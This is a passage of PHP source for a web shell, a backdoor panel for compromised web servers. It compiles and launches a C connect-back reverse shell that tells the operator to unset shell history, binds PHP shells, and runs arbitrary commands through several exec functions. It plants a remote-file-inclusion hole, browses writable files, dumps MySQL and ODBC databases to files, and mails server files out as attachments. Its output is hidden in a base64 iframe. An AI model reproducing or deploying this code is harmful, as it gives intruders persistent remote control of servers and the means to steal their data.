	<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr>
	<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr>
	</form>
	</table>";
}

###############################################################################
# drop mini inc handling
###############################################################################
if($dropinc == 1) { 
	if($loc!="") $miniinc_loc = $loc;
	$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr>
	<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2><pre>";
	if($minisave==1) $strOutput .= dropminiinc($miniinc_loc);
	$strOutput .= "</pre></td></tr>
	</form>
	</table>";
} 
###############################################################################
# connect C back shell handling
###############################################################################
if($connectback == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>
	<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>
	<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>
	<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
	$strOutput .= "</td></tr></form></table>";
}

###############################################################################
# PHP shell handling
###############################################################################
if($phpshell == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
	$strOutput .= "</td></tr></form></table>";
}


###############################################################################
# snooping
###############################################################################
if($snoop == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
	</form>
	</table>";
}
###############################################################################
# show highlited source
###############################################################################
if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>
	</form>
	</table>";
}
###############################################################################
# service check
###############################################################################
if($servicecheck == 1) {
if($servhost!="") $host = $servhost;
else $host = "localhost";

	$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr>
	<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr>
	<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr>
	<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr -->
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2><pre>";

	$hosts = explode(" ", $host);
	$port = explode(" ",$tcpports);
	$values = count($port);
	$numhosts = count($hosts);
	if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n";
	else if($values > 1) $strOutput .= "Checking $values ports..\n";
	else $strOutput .= "No ports specified!!\n";
	if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n";
	else if($numhosts == 1) $strOutput .= "On 1 host..\n";
	else $strOutput .= "No hosts specified!!\n";
	if($numhosts >= 1) {
		for($hcount=0; $hcount < $numhosts; $hcount++) {
			$tmphost = $hosts[$hcount];
			$strOutput .= "\nTesting $tmphost..\n";
			if(($values == 1 && $port[0] != "") | $values > 1) {
				for ($cont=0; $cont < $values; $cont++) {
					@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout);
					$service = getservbyport($port[$cont],"tcp");
					@$get = fgets($sock[$cont]);
					if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n";
					flush();
				}
			}
		}
	}
	$strOutput .= "</pre></td></tr>
	</form>
	</table>";
}
###############################################################################
# show phpinfo
###############################################################################
if($phpinfo == 1){ 
	phpinfo();
}
######################################################################
# db stuff
######################################################################
if($mysqlaccess == 1) {
	$strOutput .= "<table border=1>
	<form method='post' target='_parent' action='$MyLoc?$SREQ&'>
	<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr>
	<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr>
	<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr>
	<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr>
	<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr>
	<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr>
	<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr>
	<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr -->
	<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr>
	</table>";
}

if($incdbhost!="" && $incdbuser!="") {
	if($incdbvar!="") $dbh = $incdbhost;
	else $dbH = $incdbhost;
	$dbu = $incdbuser;
	$dbp = $incdbpass;
	if($incdbsql!="") $dbs = $incdbsql;
	if($incdbname!="") $dbn = $incdbname;
	if($incdbtable!="") $dbt = $incdbtable;
	if($incdbfile!="") $dumpfile = $incdbfile;
}

if(isset($dbh)) {
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>";
	eval("\$Gdbhost = \"\$$dbh\";");
	eval("\$Gdbuser = \"\$$dbu\";");
	eval("\$Gdbpass = \"\$$dbp\";");
	eval("\$Gdbname = \"\$$dbn\";");
	$strOutput .= "<tr><td>";
	if($dbn=="") {
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
		"</td></tr><tr><td>" .
		display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
	} else if(isset($dbs)) {
		$Gdbsql = $dbs;
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql . 
		"</td></tr><tr><td>";
		if(isset($dumpfile)) {
			$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
		} else {
			$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
		}
	} else if(isset($dbt)) {
		$Gdbtabl = $dbt;
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
		$strOutput .= "</td></tr><tr><td>";
		if(isset($dumpfile)) {
			$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);		
		} else {
			$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
		}
	} else {
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
		"</td></tr><tr><td>" .
		display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}

if(isset($dbH)) {
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>";
	if($dbn=="") {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
		"</td></tr><tr><td>".
		display_dbs($dbH, $dbu, $dbp);
	} else if(isset($dbs)) {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs.
		"</td></tr><tr><td>";
		if(isset($dumpfile)) {
			$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
		} else {
			$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
		}
	} else if(isset($dbt)) {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
		$strOutput .= "</td></tr><tr><td> ";
		if(isset($dumpfile)) {
			$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);		
		} else {
			$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
		}
	} else {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
		"</td></tr><tr><td>" .
		display_tables($dbH, $dbu, $dbp, $dbn);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}

if(isset($Odbh)) {
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>";
	eval("\$Gdbhost = \"\$$Odbh\";");
	eval("\$Gdbuser = \"\$$dbu\";");
	eval("\$Gdbpass = \"\$$dbp\";");
	eval("\$Gdbname = \"\$$dbn\";");
	$strOutput .= "<tr><td>";
	if(isset($dbt)) {
		$Gdbtabl = $dbt;
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
		"</td></tr><tr><td>" .
		display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
	} else {
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
		"</td></tr><tr><td> " .
		Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}

if(isset($OdbH)) {
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>";
	if(isset($dbt)) {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
		"</td></tr><tr><td> " .
		Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
	} else {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
		"</td></tr><tr><td> " .
		Odisplay_tables($OdbH, $dbu, $dbp);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}


$strOutput .= "</font></td></tr></table>";
$strOutputB64 = chunk_split(base64_encode($strOutput));
echo "</div></div></div></div></div></div></div></div></div></div>\n";
echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">';

######################################################################
#
# functions
#
######################################################################
# make globals avail
function import_globals()  
{
	global $HTTP_SERVER_VARS;
	global $REMOTE_ADDR;  
	global $PHP_SELF;
	global $REQUESTS;
	global $SCRIPT_FILENAME;
	global $QUERY_STRING;
	global $SCRIPT_URI;
	global $SERVER_NAME;
	$_igr = ini_get('register_globals');
	if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC');
	if (phpversion() <= '4.1.0') {
		$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS); 
	} else {
		$REQUESTS = $_REQUEST;
	}
	if($_SERVER['PHP_SELF']=="") {
		$SERVER_NAME     = $HTTP_SERVER_VARS['SERVER_NAME'];
		$SCRIPT_URI      = $HTTP_SERVER_VARS['SCRIPT_URI'];
		$REMOTE_ADDR     = $HTTP_SERVER_VARS['REMOTE_ADDR'];
		$QUERY_STRING    = $HTTP_SERVER_VARS['QUERY_STRING'];
		$PHP_SELF        = $HTTP_SERVER_VARS['PHP_SELF'];
		$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
	} else {
		$SERVER_NAME     = $_SERVER['SERVER_NAME'];
		$SCRIPT_URI      = $_SERVER['SCRIPT_URI'];
		$REMOTE_ADDR     = $_SERVER['REMOTE_ADDR'];
		$QUERY_STRING    = $_SERVER['QUERY_STRING'];
		$PHP_SELF        = $_SERVER['PHP_SELF'];
		$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME'];
	}
}

function dd($v) {
	global $DebugArr;
	$rv = "<blockquote>\n";
	$q="while(list(\$key,\$val) = each(\$$v)) {".
	' if(array_search($key, $DebugArr)) {'.
	' } else if((is_array($val)) && ($key!="GLOBALS")) {'.
	'  echo "<b>$key</b>>><br/>";'.
	'  @dd($v."[".$key."]");'.
	' } else if($key=="GLOBALS") {'.
	' } else echo "<b>$key</b>=>$val<br/>";'.
	'};';
	eval($q);
	echo "</blockquote>\n";
}

function ddb($v) {
	echo "<blockquote>\n";
	$q="while(list(\$key,\$val) = each(\$$v)) {".
	' if((is_array($val)) && ($key!="GLOBALS")) {'.
	'  echo "<b>$key</b>>><br/>";'.
	'  @dd($v."[".$key."]");'.
	' } else if($key=="GLOBALS") {'.
	' } else echo "<b>$key</b>=>$val<br/>";'.
	'};';
	eval($q);
	echo "</blockquote>\n";
}

######################################################################
# cmd shell functions
######################################################################
# test what cmd is working
function test_cmd_shell(){
	if(strlen(Mexec("pwd", 5))>11)     $var = 5;
	elseif(strlen(Mexec("pwd", 4))>11) $var = 4;
	elseif(strlen(Mexec("pwd", 3))>11) $var = 3;
	elseif(strlen(Mexec("pwd", 2))>0) $var = 2;
	elseif(strlen(Mexec("pwd", 1))>0) $var = 1;
	else $var = 0;
	return $var;
}
# function for executing cmds
function Mexec($Mcmd, $type) {
	if($Mcmd != ""){
		$dspec = array(
			0 => array("pipe", "r"),
			1 => array("pipe", "w"),
			2 => array("pipe", "r")
		);
		$output = "";
		switch($type) {
			case 5:
				$output .= "<pre>";
				$lastline = exec($Mcmd, $arrOutput);
				foreach($arrOutput as $val) {
					$output .= $val . "\n";
				}
				$output .= "</pre>";
				break;
			case 4:
				$proc = proc_open($Mcmd, $dspec, $pipes);
				if (is_resource($proc)) {
					$output .= "<pre>";
					fclose($pipes[0]);
					while(!feof($pipes[1])) {
						$tmp = fgets($pipes[1], 1024);
						$output .= $tmp;
					}
					$output .= "</pre>";
				}
				break;
			case 3;
				$output .= "<pre>";
				$output .= `$Mcmd`;
				$output .= "</pre>";
				break;
			case 2;
				print "<pre>\n";
				$output = system($Mcmd);
				print "</pre>\n";
				break;
			case 1;
				print "<pre>\n";
				$output = passthru($Mcmd);
				print "</pre>\n";
				break;
			case 0;
			default;
				$output = "There are no execute functions available!";
				break;
		}
		return $output;
	}	
}
function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) {
	$msgerror = "";
	if($msg == "") $msgerror = "please enter a message";
	elseif($subject == "") $msgerror = "please enter a subject";
	else {
		$stlf = md5(uniqid(time())); 
		$attach = "";
		$fp = fopen($attach_source, "rb"); 
		if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); } 
		$header = "From: $from\n"; 
		$header .= "MIME-Version: 1.0\n"; 
		$header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n"; 
		$header .= "This is a multi-part message in MIME format\n"; 
		$header .= "--$stlf\n"; 
		$header .= "Content-Type: text/plain\n"; 
		$header .= "Content-Transfer-Encoding: 8bit\n\n"; 
		$header .= "$msg\n"; 
		$header .= "--$stlf\n"; 
		$header .= "Content-Type: $content_type; name=$attach_appear\n"; 
		$header .= "Content-Transfer-Encoding: base64\n"; 
		$header .= "Content-Disposition: attachment; filename=$attach_appear\n\n"; 
		$header .= chunk_split(base64_encode($attach)); 
		$header .= "\n"; 
		$header .= "--$stlf--"; 
		mail($to,$subject,"",$header); 
		$msgerror = "send done - show header: <br>\n<pre>$header</pre> ";
	} 
	return $msgerror;
}

######################################################################
# system browsing
######################################################################

function make_switch($val){
	global $txt;
	global $lang;
	global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER;
	if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; }
	else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; }
	return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> ";
}
function drop_syslog_warning($msg) {
	global $syslog;
#	if($syslog == 1) syslog(LOG_WARNING,$msg);
}

######################################################################
# file functions
######################################################################
function copy_file($source,$dest) {
	$dataout = "";
	if($source == "")  $dataout .= "enter source<br>\n";
	if($dest != "") {
		ini_set("user_agent","m0ins downloader");
		if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n";
		if(file_exists($dest)) $dataout .= highlight_file($dest, 1);
	} else {
		$dataout .= "enter destination";
	}
}
function edit_file($cont,$dest,$do) {
	$dataout = "";
	global $magic_quotes_gpc;
	if(file_exists($dest)) {
		if($do == 1){
			$fh = fopen($dest, "w");		
			if(!$fh) {
				$dataout .= "unable to open <b>$dest</b>.\n";
			} else {
#				$cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont));
				if($magic_quotes_gpc == 1) $cont = stripslashes($cont);
				$write = fwrite($fh, $cont);
				fclose($fh);
			}
		}
		$dataout .= highlight_file($dest, 1);
	} else {
		$dataout .= "unable to open <b>$dest</b>.\n";
	}
	return $dataout;
}
function show_file($source) {
	$dataout = "";
	if(file_exists($source)) {
		$fh = fopen($source, "r");
		if(!$fh) {
			$dataout .= "unable to open <b>$source</b>.\n";
		} else {
			$read = fread($fh, filesize($source));
			fclose($fh);
			if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read));
			$dataout .= $read;
		}
	} else {
		$dataout .= "unable to open <b>$source</b>.\n";
	}
	return $dataout;
}
function snoopy($chdir){
	$tmpOut = "";
	global $is_file,$is_dir,$is_w_dir,$is_w_file;
	$fh = opendir("$chdir");
	if($fh!="") {
		while (false !== ($filename = readdir($fh)) ) {
			$FN = $chdir."/".$filename;
			if(@is_file($FN)) $is_file[] = $filename;
			if(@is_dir($FN))  $is_dir[] = $filename;
			if(@is_writable($FN) && @is_dir($filename))  $is_w_dir[] = $filename;
			if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename;
		}
		$tmpOut .=  "<table border=1 cellspacing=1 cellpadding=0><tr>";
		$tmpOut .= echo_files($is_file,  "all files");
		$tmpOut .= echo_files($is_dir,   "only dirs");
		$tmpOut .= echo_files($is_w_dir, "writable dirs");
		$tmpOut .= echo_files($is_w_file,"writable files");
		$tmpOut .= "</tr></table>";
	} else {
		$tmpOut .= "Permission denied.";
	}
	closedir($fh);
	return $tmpOut;
}

function echo_files($arr,$txt){
	$tmpOutMF = "";
	global $chdir,$MyLoc,$SREQ;
	$tmpOutMF .= "<td valign=top>";
	$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>";
	if(count($arr) > 0) {
		foreach($arr as $key => $file) {
			$FN = $chdir."/".$file;
			$owner = fileowner($FN);
			$perms = substr(sprintf("%o",fileperms($FN)),-3);
			if(@is_writable($FN) && @is_dir($FN))  $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
			elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>";
			elseif(@is_file($FN)) $tmpOutMF .=  "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>"; 
			elseif(@is_dir($FN))  $tmpOutMF .=  "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
		}
	}
    $tmpOutMF .=  "</td>";
    return $tmpOutMF;
}
function print_globals($v) {
	global $a;
	echo "<blockquote>\n";
	$q= "while(list(\$key,\$val) = each($".$v. ") ) { ".
	" echo \"<b>\$key</b>=>\$val.<br>\"; ".
	" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {".
	" @print_globals( \$v.\"[\".\$key.\"]\" );".
	"}}";
	eval($q);
	echo "</blockquote>\n";
}
######################################################################
# connect back shell function
######################################################################

function connect_back($tmp_dir, $compiler, $host, $port) {
    $shell = "#include <stdio.h>\n" .
             "#include <sys/socket.h>\n" .
             "#include <netinet/in.h>\n" .
             "#include <arpa/inet.h>\n" .
             "#include <netdb.h>\n" .
             "int main(int argc, char **argv) {\n" .
             "  char *host;\n" .
             "  int port = 80;\n" .
             "  int f;\n" .
             "  int l;\n" .
             "  int sock;\n" .
             "  struct in_addr ia;\n" .
             "  struct sockaddr_in sin, from;\n" .
             "  struct hostent *he;\n" .
             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
             "                \"For More Reliable Shell.\\n\"\n" .
             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
             "  if (argc < 2 || argc > 3) {\n" .
             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
             "    return 1;\n" .
             "  }\n" .
             "  printf(\"[*] Dumping Arguments\\n\");\n" .
             "  l = strlen(argv[1]);\n" .
             "  if (l <= 0) {\n" .
             "    printf(\"[-] Invalid Host Name\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  if (!(host = (char *) malloc(l))) {\n" .
             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  strncpy(host, argv[1], l);\n" .
             "  if (argc == 3) {\n" .
             "    port = atoi(argv[2]);\n" .
             "    if (port <= 0 || port > 65535) {\n" .
             "      printf(\"[-] Invalid Port Number\\n\");\n" .
             "      return 1;\n" .
             "    }\n" .
             "  }\n" .
             "  printf(\"[*] Resolving Host Name\\n\");\n" .
             "  he = gethostbyname(host);\n" .
             "  if (he) {\n" .
             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
             "    return 1;\n" .
             "  }\n" .
             "  sin.sin_family = PF_INET;\n" .
             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
             "  sin.sin_port = htons(port);\n" .
             "  printf(\"[*] Connecting...\\n\");\n" .
             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
             "    printf(\"[-] Socket Error\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
             "    printf(\"[-] Unable to Connect\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  printf(\"[*] Spawning Shell\\n\");\n" .
             "  f = fork( );\n" .
             "  if (f < 0) {\n" .
             "    printf(\"[-] Unable to Fork\\n\");\n" .
             "    return 1;\n" .
             "  } else if (!f) {\n" .
             "    write(sock, msg, sizeof(msg));\n" .
             "    dup2(sock, 0);\n" .
             "    dup2(sock, 1);\n" .
             "    dup2(sock, 2);\n" .
             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
             "    close(sock);\n" .
             "    return 0;\n" .
             "  }\n" .
             "  printf(\"[*] Detached\\n\\n\");\n" .
             "  return 0;\n" .
             "}\n";
    $fbname = $tmp_dir . "/cbs";
	$fp = fopen($fbname . ".c", "w");
	$write = fwrite($fp, $shell);
	fclose($fp);
	if(!empty($write)) {
		$command = $compiler . " -o " . $fbname . " " . $fbname . ".c";
		$execM = test_cmd_shell();
		if($execM > 0) {
			$rtval = Mexec($command, $execM);
			$command = $fbname . " " . $host . " " . $port;
			$rtval .= Mexec($command, $execM);
			return "<pre>" . $rtval . "</pre>";
		} else {
			return "<b>ERROR! No EXEC Avilable!</b>";
		}
		
	} else {
		return "<b>ERROR! Writing data!</b>";
	}
}

######################################################################
# drop mini inc hole
######################################################################
function dropminiinc($location) {
	$Scode = "<?php\n".
		"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n".
		"else \$vars = \$_REQUEST;\n".
		"include(\$vars[inc]);\n".
		"?>\n";
	$fp = fopen($location, "w");
	$write = fwrite($fp, $Scode);
	if(!empty($write)) return "<b>$location</b> copied\n";
	else return "<b>ERROR! Not copied!</b>";
}

######################################################################
# db functions
# unchanged from dans code
######################################################################
function prep_rows($myresult) {
	$dataout = "<table>\n";
	$num_fields = mysql_num_fields($myresult);
	$dataout .= "<tr border=1>\n";
	for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>";
	$dataout .= "</tr>\n";
	while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) {
		$dataout .= "<tr>\n";
		foreach($line as $colvalue) {
			$dataout .= "<td>$colvalue</td>\n";
		}
	$dataout .= "</tr>\n";
	}
	$dataout .= "</table>\n";
	return $dataout;
}

function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";";
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	mysql_free_result($result);
	mysql_close($link);
	return "Hopefully dumped!";
}

function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = $mysql." INTO OUTFILE \"".$mydump."\";";
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	mysql_free_result($result);
	mysql_close($link);
	return "Hopefully dumped!";
}

function display_query($myhost, $myuser, $mypass, $mydb, $mysql) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = $mysql;
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	$dataouted = prep_rows($result);
	mysql_free_result($result);
	mysql_close($link);
	return($dataouted);
}

function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = "SELECT * FROM ".$mytable;
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	$dataouted = prep_rows($result);
	mysql_free_result($result);
	mysql_close($link);
	return($dataouted);
}

function display_tables($myhost, $myuser, $mypass, $mydb) {
	global $MyLoc,$SREQ;
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	$result = mysql_list_tables($mydb);
	if (!$result) {
		return "DB Error, could not list tables";
	}
	$dataout = "<table>\n";
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
		$dataout .= "<tr>\n";
		foreach ($line as $col_value) {
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n";
		}
	$dataout .= "</tr>\n";
	}
	$dataout .= "</table>\n";
	mysql_free_result($result);
	mysql_close($link);
	return($dataout);
}

function display_dbs($myhost, $myuser, $mypass) {
	global $MyLoc,$SREQ;
	$link = mysql_connect($myhost, $myuser, $mypass);
	$result = mysql_list_dbs($link);
	if (!$result) {
		return "DB Error, could not list databases";
	}
	$dataout = "<table>\n";
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
		$dataout .= "<tr>\n";
		foreach ($line as $col_value) {
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n";
		}
	$dataout .= "</tr>\n";
	}
	$dataout .= "</table>\n";
	mysql_free_result($result);
	mysql_close($link);
	return($dataout);
}

function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
